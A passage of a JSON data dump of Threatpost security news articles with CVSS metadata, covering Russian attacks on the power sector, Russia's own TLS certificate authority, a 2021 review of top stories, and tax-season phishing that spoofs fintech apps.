immediately before they are used for attacks that could be bigger than those we\u2019ve already seen, include:\n\n * **Default Passwords**: Exactly what it sounds like. Default passwords are a major attack vector. Not changing default passwords, especially with a tool like Telnet, leaves companies wide open to Russian access to networks.\n * [**Port 161 \u2013 SNMP protocol**](<https://www.cisa.gov/uscert/ncas/alerts/TA18-106A>): The Simple Network Management Protocol (SNMP) uses both port 161 and port 162 for sending commands and messages and is being used by Russia to gain access to network devices and infrastructure. Older versions of this protocol are unsecure and allow threat actors to eavesdrop or manipulate data.\n * **Port 139/445 \u2013 SMB: **The SMB network port is commonly used for file sharing. Russian groups have successfully targeted this port to execute remote code and to steal information, LookingGlass found.\n\nThese are just a few examples of security exposures that threat actors tied directly to Russia have exploited and will likely exploit again within U.S. companies, according to LookingGlass\u2019s research.\n\nIt\u2019s not time to wait for a nuclear-level cyber event, given that threat actors are already inside the power infrastructure. Now\u2019s the time for companies to find and mitigate the holes that let them in, Louie said.\n\n\u201cEnergy sector entities should be reviewing their digital footprint and taking action to secure their external-facing assets, especially as the threat of Russian cyberattacks intensifies,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-25T21:25:17", "type": "threatpost", "title": "DOJ Indicts Russian Gov\u2019t Employees Over Targeting Power Sector", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-25T21:25:17", "id": "THREATPOST:138507F793D8399AF0EE1640C46A9698", "href": "https://threatpost.com/doj-indicts-russian-govt-employees-over-targeting-power-sector/179108/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T18:35:15", "description": "Russia is offering its own trusted Transport Layer Security (TLS) certificate authority (CA) to replace certificates that need to be renewed by foreign countries. As it is, a pile of sanctions imposed in the wake of Russia\u2019s invasion of Ukraine is gumming up its citizen\u2019s access to websites.\n\nAs it is, Russian sites are stuck, unable to renew their certs because sanctions keep signing authorities in many countries unable to accept payments from Russia, according to[ BleepingComputer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>).\n\nTLS \u2013 more commonly known as SSL, or TLS/SSL \u2013 is a cryptographic protocol that secures the internet by encrypting data sent between your browser, the websites you visit and the website\u2019s server. The certificates keep data transmission private and prevent modification, loss or theft, as digicert [explains](<https://www.digicert.com/tls-ssl/tls-ssl-certificates>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/11125728/how_TLS_certificates_work-e1647021505756.jpg>)\n\nHow TLS certificates work. Source: Digicert.\n\nAccording to a[ notice](<https://www.gosuslugi.ru/tls>) on Russia\u2019s public service portal, Gosuslugi, as shown in a translated version in this article\u2019s featured art, the certificates will replace foreign security certs if they expire or get yanked by foreign CAs. According to the portal, the service is available to all legal entities operating in Russia, with the certificates delivered to site owners upon request within five working days.\n\n## The \u2018Digital Iron Curtain\u2019\n\nOver the past two weeks, Russia\u2019s internet services have been cut off by multiple major U.S. internet suppliers, including [Cogent Communications](<https://www.siliconrepublic.com/comms/russia-internet-backbone-cogent-ukraine>), reportedly the second-largest internet carrier servicing Russia. Lumen, another major U.S. internet supplier, [followed suit](<https://www.washingtonpost.com/technology/2022/03/08/lumen-internet-russia-backbone-cut/>) on Tuesday, pushing the country\u2019s citizens behind what some analysts are calling \u201ca new digital Iron Curtain.\u201d\n\nMikhail Klimarev, executive director of the [Internet Protection Society](<https://2020.internethealthreport.org/>), which advocates for digital freedoms in Russia, told [The Washington Post](<https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/>) that he\u2019s \u201cvery afraid of this.\u201d\n\n\u201cI would like to convey to people all over the world that if you turn off the Internet in Russia, then this means cutting off 140 million people from at least some truthful information. As long as the Internet exists, people can find out the truth. There will be no Internet \u2014 all people in Russia will only listen to propaganda.\u201d\n\n## Chrome, Firefox, Edge Won\u2019t Swallow the New Certs\n\nBleepingComputer reported on Thursday that the only web browsers that were recognizing the new CA as trustworthy at the time were the Russia-based Yandex browser and Atom products: Russian users\u2019 only alternative to browsers such as Chrome, Firefox, Edge and others.\n\nSomebody with a Mozilla domain email on Thursday started a [thread](<https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/QaKxfr5hOXg>) to discuss examination of the new root Russia cert, pointing to the possibility of the Russian government using it to start mand-in-the-middle (MitM) [attacks](<https://bugzilla.mozilla.org/show_bug.cgi?id=1758773>) \u2013 though, they said, none had been detected as of yesterday.\n\n\u201cAlthough at present there\u2019s no MitM, it\u2019s likely that government websites will start using this and once adoption is high enough Russia will perhaps start MitM,\u201d they said. They cited an ISP who said that it had been told that the new cert was mandatory, making the certificate \u201cworth urgent consideration.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T18:34:34", "type": "threatpost", "title": "Russia Issues Its Own TLS Certs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T18:34:34", "id": "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "href": "https://threatpost.com/russia-issues-its-own-tls-certs/178891/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T23:43:39", "description": "As 2021 draws to a close, and the COVID-19 pandemic drags on, it\u2019s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).\n\nWhile 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list \u2013 perhaps indicating that people are keenly focused on cybercrime innovation as the \u201cnew normal\u201d for how we work becomes more settled in.\n\n_**Jump to section:**_\n\n 1. Data Leakapalooza\n 2. Major Zero-Day Vulnerabilities\n 3. Code Repository Malware\n 4. Ransomware Innovations\n 5. Gaming Attacks\n 6. Bonus! Zodiac Killer Cipher Cracked\n\n## **1\\. The Most-Read Story of 2021: Experian Leaks Everyone\u2019s Credit Scores**\n\nThere were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in\u2026the Experian data exposure.\n\nIn April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American [were exposed](<https://threatpost.com/experian-api-leaks-american-credit-scores/165731/>) through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/29144158/Experian.jpg>)\n\nThe tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool that let him automate lookups for any credit score for nearly anyone, even after entering all zeros in the fields for date of birth, which he named, \u201cBill\u2019s Cool Credit Score Lookup Utility.\u201d\n\nIn addition to raw credit scores, the college student said that he was able to use the API connection to get \u201crisk factors\u201d from Experian that explained potential flaws in a person\u2019s credit history, such as \u201ctoo many consumer-finance company accounts.\u201d\n\nExperian, for its part, fixed the problem \u2013 and refuted concerns from the security community that the issue could be systemic.\n\nExperian wasn\u2019t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.\n\n### **LinkedIn Data Scraping**\n\nAfter 500 million LinkedIn members were affected in a data-scraping incident in April, [it happened again](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>) in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself \u201cGOD User TomLiner.\u201d The advertisement included a sample of 1 million records as \u201cproof.\u201d\n\nPrivacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It\u2019s unclear what the origin of the data is \u2013 but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.\n\nEven so, the security ramifications were significant, researchers said, in terms of the cache enabling brute-force cracking of account passwords, email and telephone scams, phishing attempts, identity theft and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users\u2019 jobs and gender, among other details.\n\n## **2\\. Major Zero-Day Bugs**\n\nOK, this one\u2019s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.\n\n### **Log4Shell Threatens Basically All Web Servers in Existence**\n\nThe Log4Shell vulnerability is [an easily exploited flaw](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s still being actively exploited in the wild.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/21151757/Logs-e1640117899602.png>)\n\nThe flaw (CVE-2021-44228) first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.\n\n### **NSO Group\u2019s Zero-Click Zero Day for Apple**\n\nIn September, a [zero-click zero-day](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) dubbed ForcedEntry be researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turns out that it was being exploited by NSO Group to install the infamous Pegasus spyware.\n\nApple pushed out an emergency fix, but Citizen Lab had already observed the NSO Group targeting never-before-seen, zero-click exploit targeting iMessage to illegally spy on Bahraini activists.\n\nThe ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions \u2013 14.4 &amp; 14.6 \u2013 blowing past Apple\u2019s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.\n\n### **Giant Zero-Day Hole in Palo Alto Security Appliances**\n\nAnother zero-day item that garnered big reader interest was [the news](<https://threatpost.com/massive-zero-day-hole-found-in-palo-alto-security-appliances/176170/>) that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks\u2019 GlobalProtect firewall, via the critical bug CVE 2021-3064.\n\nRandori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: \u201cOnce an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.\u201d\n\nPalo Alto Networks patched the bug on the day of disclosure.\n\n### **The Great Google Memory Bug Zero-Day**\n\nIn March, Google [hurried out a fix](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/11/03120131/Google-Chrome-Browser.jpg>)\n\nNew york, USA \u2013 july 26, 2019: Start google chrome application on computer macro close up view in pixel screen\n\nThe flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.\n\n\u201cBy persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,\u201d according to IBM X-Force\u2019s report on the bug.\n\n### **Dell Kernel-Privilege Bugs**\n\nEarlier this year, five high-severity security bugs that remained hidden for 12 years [were found](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow the ability to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.\n\nThe flaws lurked in Dell\u2019s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.\n\nThe multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.\n\n## 3\\. Code Repositories and the Software Supply Chain\n\nThe software supply chain is anchored by open-source code repositories \u2013 centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.\n\nThese package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs\u2019 users.\n\nTo boot, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27155850/threatlist-python.png>)\n\nCybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.\n\nFor instance, in December, a [series of 17 malicious packages](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The coal was to steal Discord tokens, which can be used to take over accounts.\n\nAlso this month, three malicious packages hosted in the PyPI code repository [were uncovered](<https://threatpost.com/malicious-pypi-code-packages/176971/>), which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims\u2019 machines, and two info-stealers.\n\nResearchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from [Log4Shell exploits](<https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/>). It will likely take \u201cyears\u201d for it to be fixed across the ecosystem, [according](<https://threatpost.com/java-supply-chain-log4j-bug/177211/>) to Google\u2019s security team.\n\nUsing malicious packages as a cyberattack vector was a common theme earlier in the year too. Here\u2019s a rundown of other recent discoveries:\n\n * In January, other Discord-stealing malware [was discovered](<https://threatpost.com/discord-stealing-malware-npm-packages/163265/>) in three npm packages. One, \u201can0n-chat-lib\u201d had no legitimate \u201ctwin\u201d package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they\u2019re legitimate. The \u201cdiscord-fix\u201d malicious component is named to be similar to the legitimate \u201cdiscord-XP,\u201d an XP framework for Discord bots. The \u201csonatype\u201d package meanwhile made use of pure brandjacking.\n * In March, researchers [spotted](<https://threatpost.com/malicious-code-bombs-amazon-lyft-slack-zillow/164455/>) malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository \u2013 all of which exfiltrated sensitive information.\n * That March attack was based on research from security researcher Alex Birsan, who found that it\u2019s possible to [inject malicious code](<https://threatpost.com/supply-chain-hack-paypal-microsoft-apple/163814/>) into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company\u2019s internal applications and systems. The novel supply-chain attack was (ethically) used to breached the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.\n * In June, a group of cryptominers was found [to have infiltrated](<https://threatpost.com/cryptominers-python-supply-chain/167135/>) the PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.\n * In July, a credentials-stealing package that uses legitimate password-recovery tools in Google\u2019s Chrome web browser [was found lurking in ](<https://threatpost.com/npm-package-steals-chrome-passwords/168004/>)npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker\u2019s command-and-control (C2) server and can upload files, record from a victim\u2019s screen and camera, and execute shell commands.\n\n## **4\\. Interesting Ransomware Variants**\n\nThe ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.\n\n### **HelloKitty\u2019s Linux Variant Targets VMs**\n\nIn June, for the first time, researchers [publicly spotted](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) a Linux encryptor \u2013 being used by the HelloKitty ransomware gang.\n\nHelloKitty, the same group behind the [February attack](<https://threatpost.com/cyberpunk-2077-publisher-hack-ransomware/163775/>) on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/16162559/hellokitty-e1626467172148.jpeg>)\n\nVMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.\n\nDirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, \u201cgoing that extra mile to add Linux as the origin of many virtualization platforms to [malware\u2019s] functionality\u201d has the welcome side effect of enabling attacks on any Linux machine.\n\n### **MosesStaff: No Decryption Available**\n\nA politically motivated group known as MosesStaff [was seen in November](<https://threatpost.com/mosesstaff-locks-targets-ransom-decryption/176366/>) paralyzing Israeli entities with no financial goal \u2013 and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.\n\nMosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.\n\n### **Epsilon Red Targets Exchange Servers**\n\nThreat actors in June [were seen deploying](<https://threatpost.com/exchange-servers-epsilon-red-ransomware/166640/>) new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.\n\nThe Epsilon Red ransomware \u2013 a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles \u2013 was discovered after an attack on a U.S.-based company in the hospitality sector.\n\nResearchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a \u201cbare-bones\u201d 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that \u201cprepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,\u201d they wrote.\n\n## **5\\. Gaming Security**\n\nFor the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.\n\n### **Steam Used to Host Malware**\n\nIn June, the appropriately named SteamHide malware [emerged](<https://threatpost.com/steam-gaming-delivering-malware/166784/>), which disguises itself inside profile images on the gaming platform Steam.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/08/01084854/Steam-logo.jpg>)\n\nThe Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: \u201cThe heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.\u201d\n\nThe steganography technique is obviously not new \u2014 but Steam profiles being used as attacker-controlled hosting sites, is \u2013 and readers\u2019 ears perked up in a big way when we posted the story.\n\n### **Twitch Source-Code Leak**\n\nIn October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch\u2019s source code, comments going back to its inception, user-payout information and more.\n\nThe attacker [claimed to have ransacked](<https://threatpost.com/twitch-source-code-leaked/175359/>) the live gameplay-streaming platform for everything it\u2019s got; Twitch confirmed the breach not long after.\n\nThe threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to \u201cfoster more disruption and competition in the online-video streaming space,\u201d because \u201ctheir community is a disgusting toxic cesspool.\u201d\n\n### **Steam-Stealing Discord Scams**\n\nIn November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.\n\nGamer-aimed Discord scams are just about everywhere. But researchers [flagged a new approach](<https://threatpost.com/free-discord-nitro-offer-steam-credentials/176011/>) as noteworthy because it crossed over between Discord and the Stream gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for \u201clinking\u201d the two accounts.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/04113440/nitro-fake-discord-website-600x324-1.png>)\n\nThe target is first served a malicious direct message on Discord with the fake offer. \u201cJust link your Steam account and enjoy,\u201d the message said, which included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, \u201cGet Nitro.\u201d Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.\n\nThe gambit is intended to fool users into thinking they\u2019re being taken to the Steam platform to enter in their login information \u2014 in reality, the crooks are poised to harvest the credentials.\n\n### **Sony PlayStation3 Bans**\n\nIn June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there [appeared to](<https://threatpost.com/ps3-players-ban-attacks-gaming/167303/>) have led to users being inexplicably banned from the platform.\n\nSony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle \u201cThe WizWiki\u201d in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn\u2019t sign on.\n\nUsers mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn\u2019t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.\n\n## **Bonus Item: Zodiac Killer Cipher \u2013 Revealed!!**\n\nOne of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac\u2019s serial killer\u2019s 340 cipher, which couldn\u2019t be solved for 50 years. \nIn December 2020, the code [was cracked](<https://threatpost.com/cryptologists-zodiac-killer-340-cipher/162353/>) by a team of mathematicians.\n\nThe Zodiac serial killer is believed to have murdered at least five people \u2014 and likely more \u2014 in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker \u201cZodiac.\u201d[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/17122725/Zodiac-e1608226062664.jpg>)\n\nThe first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australian-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote a code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:\n\n\u201cI HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.\u201d\n\nWhile the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity \u2014 access control and segmentation.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:57:24", "type": "threatpost", "title": "The 5 Most-Wanted Threatpost Stories of 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T18:57:24", "id": "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "href": "https://threatpost.com/5-top-threatpost-stories-2021/177278/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:48", "description": "Threat actors have new targets in their sites this tax season during the annual barrage of cyber-scams as people file their U.S. income-tax documents. Novel email campaigns are spoofing popular financial technology (fintech) applications and their tax notifications to try to dupe victims into giving up their credentials, researchers have found.\n\nIt\u2019s common for attackers to target popular tax filing and preparation apps such as [Intuit](<https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/>) and TurboTax in various cybercriminal campaigns during tax season, a time that\u2019s traditionally rife with scams. In 2020, for example, threat actors [targeted small tax-preparation](<https://threatpost.com/latest-tax-scam-target-apps-and-tax-prep-websites/152998/>) firms by planting malicious code on their websites to spread malware to site users.\n\nThis year, attackers have pivoted to take on the personas of fintech apps like [Stash](<https://www.stash.com/>) and [Public](<https://public.com/>) \u201cto steal credentials and give users a false sense of security that they\u2019ve compiled the right tax documents,\u201d according to[ a report](<https://www.avanan.com/blog/hackers-begin-spoofing-fintech-apps-as-tax-season-approaches>) published Thursday by Avanan, a Check Point company.\n\nIn scams observed by Avanan researchers beginning in February, attackers spoof the logo and look and feel of communication that Stash and Public might send to end users to inform them that their tax document is ready, Jeremy Fuchs, Avanan cybersecurity researcher and analyst, wrote in the report.\n\nThe email includes a link to a document \u2013 purportedly associated with the person\u2019s Stash or Public account \u2013 and invites users to use the link to log in to their accounts to access it. When the user clicks on the link, however, they are directed not to a legitimate log-in site, but to one that harvests their credentials, Fuchs said.\n\n## **Rise in Fintech Threats**\n\nFintech is a growing attack surface for threat actors due to the sheer increase in its user base in the last couple of years, primarily attributed by researchers to the pandemic-related increase in people\u2019s overall time online.\n\nAccording to [a study](<https://plaid.com/blog/report-the-fintech-effect-2021/>) by fintech startup Plaid, 88 percent of people in the United States were using some form of fintech by late 2021 \u2013 a rise of 52 percent from the 58 percent of people who reported using fintech in 2020.\n\nSurprisingly, that\u2019s more than the number of people in the United States who use streaming services or social media, making fintech an attractive target for threat actors, Fuchs wrote. \u201cThat gives hackers a wide range of people to steal credentials from,\u201d he said.\n\nThreat actors began an early foray into targeting fintech users during tax season by targeting online investment service Robinhood [last April](<https://threatpost.com/robinhood-warns-customers-of-tax-season-phishing-scams/165180/>) in a similar way to this year\u2019s campaigns spoofing Stash and Public. At the time, researchers discovered an attack vector that used phishing emails with links to fake Robinhood websites prompting visitors to enter their login credentials.\n\n## **Catching Users Off Guard**\n\nFintech companies are also an attractive target because these types of scams can catch users by surprise, Fuchs noted.\n\n\u201cThey may not be expecting tax documents from these apps, inducing them to click,\u201d he wrote in the report. \u201cSince most of these services are mobile-first, users may receive this on their phone and may forget about typical cyber 